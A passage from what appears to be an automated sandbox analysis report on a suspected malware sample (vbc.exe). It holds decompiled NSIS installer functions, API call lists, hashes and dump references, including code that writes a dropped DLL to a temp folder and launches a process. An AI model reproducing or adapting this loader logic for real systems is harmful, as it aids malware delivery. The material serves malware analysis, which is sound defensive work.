							 *0x42a088 = _t22;
							E00405BC7(0x42a0a0, 0x42f000);
							E00405B25(0x42f000, _t22);
							E0040140B(6);
							E00405BC7(0x42f000, 0x42a0a0);
						}
						L11:
						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404782(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403ECF(0x413);
				return 0;
			}




              0x00404e0f
              0x00404e34
              0x00404e54
              0x00404e57
              0x00404e5a
              0x00404e71
              0x00404e77
              0x00404e7e
              0x00404e85
              0x00404e8c
              0x00404e91
              0x00404e97
              0x00000000
              0x00404ea7
              0x00404e41
              0x00404e94
              0x00404e94
              0x00000000
              0x00404e94
              0x00404e4d
              0x00404e4f
              0x00000000
              0x00404e4f
              0x00404e15
              0x00000000
              0x00000000
              0x00404e1c
              0x00000000

              APIs
              • IsWindowVisible.USER32(?), ref: 00404E39
              • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404EA7
                • Part of subcall function 00403ECF: SendMessageA.USER32 ref: 00403EE1
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
              • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
              • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
              • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\Albus\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









              0x004024f1
              0x004024f1
              0x004024f4
              0x0040250f
              0x004024f6
              0x004024f8
              0x004024fd
              0x00402504
              0x00402516
              0x0040268f
              0x0040268f
              0x0040251c
              0x0040252e
              0x004015a6
              0x004015a8
              0x00000000
              0x004015ae
              0x004015a8
              0x004028c1
              0x004028cd

              APIs
              • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll,00000000,?), ref: 0040252E
              Strings
              • C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll, xrefs: 004024FD, 00402522
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileWritelstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll
              • API String ID: 427699356-2794715158
              • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
              • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
              • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
              • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405427, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405427(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





              0x00405430
              0x0040544c
              0x00405454
              0x00405459
              0x00000000
              0x0040545f
              0x00405463

              APIs
              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
              • CloseHandle.KERNEL32(?), ref: 00405459
              Strings
              • Error launching installer, xrefs: 0040543A
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
              • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
              • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
              • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403585, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00403585() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42905c;
				_t3 = E0040356A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42905c =  *0x42905c & 0x00000000;
				return _t3;
			}







              0x00403586
              0x0040358e
              0x00403595
              0x00403598
              0x00403598
              0x0040359a
              0x0040359f
              0x004035a6
              0x004035ac
              0x004035b0
              0x004035b1
              0x004035b9

              APIs
              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
              • GlobalFree.KERNEL32(?), ref: 004035A6
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Free$GlobalLibrary
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 1100898210-4017390910
              • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
              • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
              • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
              • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405701, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405701(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





              0x00405702
              0x0040570c
              0x0040570e
              0x00405715
              0x0040571d
              0x00000000
              0x00000000
              0x00000000
              0x0040571d
              0x0040571f
              0x00405724

              APIs
              • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402CC1,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405707
              • CharPrevA.USER32(80000000,00000000), ref: 00405715
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharPrevlstrlen
              • String ID: C:\Users\Public
              • API String ID: 2709904686-2272764151
              • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
              • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
              • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
              • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405813, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405813(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






              0x0040581f
              0x00405821
              0x00405849
              0x0040582e
              0x00405833
              0x0040583e
              0x00000000
              0x0040585b
              0x00405847
              0x00405847
              0x00000000

              APIs
              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
              • CharNextA.USER32(00000000), ref: 00405841
              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
              • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
              • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
              • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
              Uniqueness

              Uniqueness Score: -1.00%

              Analysis Process: vbc.exe PID: 2248 Parent PID: 1612 vbc.exeCOMMON

              Executed Functions

              Non-executed Functions

              Function 0040312A, Relevance: 66.8, APIs: 26, Strings: 12, Instructions: 315stringfilecomCOMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			_entry_() {
				intOrPtr _t47;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				int _t91;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t126;
				void* _t128;
				void* _t129;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001);
				if(GetVersion() != 6) {
					_t108 = E00405F57(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								__eflags =  &(_t56[2]);
								E00405BC7(0x434400,  &(_t56[2]));
								L25:
								GetTempPathA(0x400, 0x435400);
								_t60 = E004030F9(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA(0x435000);
									_t62 = E00402C55(_t136,  *(_t129 + 0x18));
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403540();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x42ecb4;
											if( *0x42ecb4 == 0) {
												L64:
												_t64 =  *0x42eccc;
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F57(5);
											_t119 = E00405F57(6);
											_t67 = E00405F57(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F57(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x42ec3c == 0) {
										L36:
										 *0x42eccc =  *0x42eccc | 0xffffffff;
										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
										goto L37;
									}
									_t123 = E004056E5(0x434000, 0);
									while(_t123 >= 0x434000) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - 0x434000;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < 0x434000) {
										_t121 = E0040540F(_t143);
										lstrcatA(0x435400, "~nsu");
										if(_t121 != 0) {
											lstrcatA(0x435400, "A");
										}
										lstrcatA(0x435400, ".tmp");
										if(lstrcmpiA(0x435400, 0x434c00) != 0) {
											_push(0x435400);
											if(_t121 == 0) {
												E004053F2();
											} else {
												E00405375();
											}
											SetCurrentDirectoryA(0x435400);
											if( *0x434400 == 0) {
												E00405BC7(0x434400, 0x434c00);
											}
											E00405BC7(0x42f000,  *(_t129 + 0x20));
											 *0x42f400 = 0x41;
											_t128 = 0x1a;
											do {
												E00405BE9(0, 0x435400, 0x428c58, 0x428c58,  *((intOrPtr*)( *0x42ec30 + 0x120)));
												DeleteFileA(0x428c58);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA(0x435c00, 0x428c58, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x428c58);
														E00405915(_t149);
														E00405BE9(0, 0x435400, 0x428c58, 0x428c58,  *((intOrPtr*)( *0x42ec30 + 0x124)));
														_t95 = E00405427(0x428c58);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x42f400 =  *0x42f400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(0x435400);
											E00405915(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040579B(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405BC7(0x434400, _t124);
									E00405BC7(0x434800, _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(0x435400, 0x3fb);
								lstrcatA(0x435400, "\\Temp");
								_t107 = E004030F9(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EE9(_t118);
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F57(0xd);
					_t47 = E00405F57(0xb);
					 *0x42ec24 = _t47;
					__imp__#17();
					__imp__OleInitialize(0);
					 *0x42ecd8 = _t47;
					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0);
					E00405BC7(0x42e420, "NSIS Error");
					E00405BC7(0x434000, GetCommandLineA());
					 *0x42ec20 = GetModuleHandleA(0);
					_t54 = 0x434000;
					if( *0x434000 == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 = 0x434001;
					}
					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}



























              0x0040313b
              0x0040313f
              0x00403147
              0x0040314b
              0x00403150
              0x00403160
              0x00403163
              0x0040316a
              0x00403171
              0x00403171
              0x0040316a
              0x00403173
              0x00403173
              0x00403289
              0x00403289
              0x00403289
              0x0040328b
              0x0040328d
              0x00000000
              0x00000000
              0x00403222
              0x00403225
              0x0040322d
              0x0040322d
              0x00403230
              0x00403235
              0x00403237
              0x00403237
              0x00403238
              0x00403238
              0x0040323d
              0x00403240
              0x00403279
              0x0040327e
              0x00403283
              0x00403286
              0x00403288
              0x00403288
              0x00403288
              0x00000000
              0x00403242
              0x00403242
              0x00403243
              0x00403246
              0x0040324e
              0x00403251
              0x00403253
              0x00403253
              0x00403253
              0x00403253
              0x00403251
              0x00403258
              0x0040325e
              0x00403266
              0x00403269
              0x0040326b
              0x0040326b
              0x0040326b
              0x0040326b
              0x00403269
              0x00403270
              0x00403277
              0x00403291
              0x00403294
              0x0040329d
              0x004032a2
              0x004032ad
              0x004032b3
              0x004032b8
              0x004032ba
              0x004032e0
              0x004032e5
              0x004032ef
              0x004032f6
              0x004032fa
              0x00403361
              0x00403361
              0x00403366
              0x0040336c
              0x00403370
              0x00403485
              0x0040348b
              0x00403528
              0x00403528
              0x0040352d
              0x00403530
              0x00403532
              0x00403532
              0x0040353a
              0x0040353a
              0x0040349a
              0x004034a3
              0x004034a5
              0x004034aa
              0x004034ac
              0x004034ae
              0x004034b0
              0x004034b2
              0x004034b4
              0x004034b6
              0x004034c6
              0x004034c8
              0x004034ca
              0x004034d7
              0x004034e6
              0x004034ee
              0x004034f6
              0x004034f6
              0x004034ca
              0x004034b6
              0x004034b2
              0x004034fa
              0x004034ff
              0x00403506
              0x00403514
              0x00403517
              0x0040351d
              0x0040351f
              0x00000000
              0x00000000
              0x00000000
              0x00403508
              0x0040350e
              0x00403510
              0x00403512
              0x00403521
              0x00403523
              0x00000000
              0x00403523
              0x00000000
              0x00403512
              0x00403506
              0x0040337f
              0x00403386
              0x00403386
              0x00403302
              0x00403351
              0x00403351
              0x0040335d
              0x00000000
              0x0040335d
              0x0040330b
              0x00403318
              0x0040330f
              0x00403315
              0x00000000
              0x00000000
              0x00403317
              0x00403317
              0x00403317
              0x0040331c
              0x0040331e
              0x00403326
              0x00403397
              0x00403399
              0x004033a0
              0x004033a8
              0x004033a8
              0x004033b3
              0x004033c7
              0x004033cb
              0x004033cc
              0x004033d5
              0x004033ce
              0x004033ce
              0x004033ce
              0x004033db
              0x004033e7
              0x004033ef
              0x004033ef
              0x004033fd
              0x00403404
              0x0040340d
              0x00403413
              0x0040341f
              0x00403425
              0x0040342f
              0x00403439
              0x0040343f
              0x00403441
              0x00403443
              0x00403444
              0x00403445
              0x00403456
              0x0040345c
              0x00403463
              0x00403466
              0x0040346c
              0x0040346c
              0x00403463
              0x00403441
              0x00403470
              0x00403476
              0x00403476
              0x00403476
              0x00403479
              0x0040347a
              0x0040347b
              0x0040347b
              0x00000000
              0x004033c7
              0x00403328
              0x0040332a
              0x00403335
              0x00000000
              0x00000000
              0x0040333d
              0x00403348
              0x0040334d
              0x00000000
              0x0040334d
              0x004032c2
              0x004032ce
              0x004032d3
              0x004032d8
              0x004032da
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00403277
              0x00000000
              0x00000000
              0x00000000
              0x00403227
              0x00403227
              0x00403227
              0x00403228
              0x00403228
              0x00000000
              0x00403227
              0x00000000
              0x00403178
              0x00403179
              0x00403185
              0x0040318b
              0x00000000
              0x0040318d
              0x0040318f
              0x00403196
              0x0040319b
              0x004031a0
              0x004031a7
              0x004031ad
              0x004031c3
              0x004031d3
              0x004031e5
              0x004031f8
              0x004031fd
              0x004031ff
              0x00403201
              0x00403206
              0x00403206
              0x00403216
              0x0040321c
              0x00000000
              0x0040321c

              APIs
              • SetErrorMode.KERNEL32 ref: 00403150
              • GetVersion.KERNEL32 ref: 00403156
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
              • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
              • OleInitialize.OLE32(00000000), ref: 004031A7
              • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
              • GetCommandLineA.KERNEL32(0042E420,NSIS Error), ref: 004031D8
              • GetModuleHandleA.KERNEL32(00000000,00434000,00000000), ref: 004031EB
              • CharNextA.USER32(00000000), ref: 00403216
              • GetTempPathA.KERNEL32(00000400,00435400), ref: 004032AD
              • GetWindowsDirectoryA.KERNEL32(00435400,000003FB), ref: 004032C2
              • lstrcatA.KERNEL32(00435400,\Temp), ref: 004032CE
              • DeleteFileA.KERNEL32(00435000), ref: 004032E5
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • OleUninitialize.OLE32 ref: 00403366
              • ExitProcess.KERNEL32 ref: 00403386
              • lstrcatA.KERNEL32(00435400,~nsu,00434000,00000000,00000020), ref: 00403399
              • lstrcatA.KERNEL32(00435400,00409148,00435400,~nsu,00434000,00000000,00000020), ref: 004033A8
              • lstrcatA.KERNEL32(00435400,.tmp,00435400,~nsu,00434000,00000000,00000020), ref: 004033B3
              • lstrcmpiA.KERNEL32(00435400,00434C00,00435400,.tmp,00435400,~nsu,00434000,00000000,00000020), ref: 004033BF
              • SetCurrentDirectoryA.KERNEL32(00435400,00435400), ref: 004033DB
              • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
              • CopyFileA.KERNEL32 ref: 00403439
              • CloseHandle.KERNEL32(00000000), ref: 00403466
              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
              • ExitProcess.KERNEL32 ref: 0040353A
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
              • String ID: $ /D=$ _?=$"$.tmp$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$~nsu
              • API String ID: 3469842172-3839672597
              • Opcode ID: 9448f30a402cd05d4ed19a4029ce3e8ae183e0eaa977f2d261942117e08e1749
              • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
              • Opcode Fuzzy Hash: 9448f30a402cd05d4ed19a4029ce3e8ae183e0eaa977f2d261942117e08e1749
